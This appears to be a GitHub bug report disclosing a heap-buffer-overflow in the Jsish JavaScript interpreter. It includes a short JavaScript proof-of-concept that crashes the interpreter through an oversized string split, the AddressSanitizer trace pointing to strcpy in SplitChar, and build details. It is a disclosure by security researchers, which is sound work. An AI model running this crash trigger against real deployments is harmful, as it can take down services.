You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
try{vara=" a aaaa ".repeat(1+100<<16).split();JSON.parse(parse(JSON.stringify));}catch(a){}JSON.stringify(+a);
// poc.jstry{vara=" a aaaa ".repeat(1+100<<16).split();}catch(a){}
Execution steps & Output
$ ./jsish/jsish poc.js
max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196
max alloc exceeded 211812358Jsi_DSSetLength src/jsiDString.c:196
=================================================================
==3965184==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2d8707c900 at pc 0x00000049123e bp 0x7ffefcbaf3e0 sp 0x7ffefcbaeba0
WRITE of size 52953081 at 0x7f2d8707c900 thread T0
#0 0x49123d in strcpy (./jsish/jsish+0x49123d)
#1 0x5525eb in SplitChar ./jsish/src/jsiUtils.c:2061:5
#2 0x5525eb in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16
#3 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9
#4 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22
#5 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10
#6 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17
#7 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25
#8 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10
#9 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c
#10 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12
#11 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18
#12 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26
#13 0x7f2d90778082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16
#14 0x42c9bd in _start (./jsish/jsish+0x42c9bd)
0x7f2d8707c900 is located 0 bytes to the right of 100000000-byte region [0x7f2d8111e800,0x7f2d8707c900)
allocated by thread T0 here:
#0 0x4a5419 in realloc (./jsish/jsish+0x4a5419)
#1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15
SUMMARY: AddressSanitizer: heap-buffer-overflow (./jsish/jsish+0x49123d) in strcpy
Shadow bytes around the buggy address:
0x0fe630e078d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e078e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e078f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e07900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e07910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe630e07920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3965184==ABORTING
Jsish revision
Commit: 42c694c
Version: v3.5.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
export JSI__SANITIZE=1 makeTest case
testcase
Execution steps & Output
Credits: @Ye0nny, @EJueon of the seclab-yonsei.
The text was updated successfully, but these errors were encountered: